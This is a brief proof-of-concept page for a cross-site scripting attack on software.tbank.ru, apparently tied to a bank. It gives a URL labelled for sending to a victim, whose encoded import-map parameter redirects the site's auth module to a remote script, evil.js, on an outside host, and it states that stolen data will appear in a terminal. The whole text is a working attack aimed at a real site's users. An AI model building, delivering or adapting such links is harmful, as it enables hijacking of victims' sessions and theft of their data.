PoC: software.tbank.ru XSS
Attack URL (send to victim):
https://software.tbank.ru/?imo=%7B%22imports%22%3A%7B%22%40tinkoff-software%2Fauth%22%3A%22https%3A%2F%2F%5C%5Cskills.autoterminal-miniapp.ru%2Fevil.js%22%7D%7D
Open attack URL in new tab
Stolen data will appear in terminal.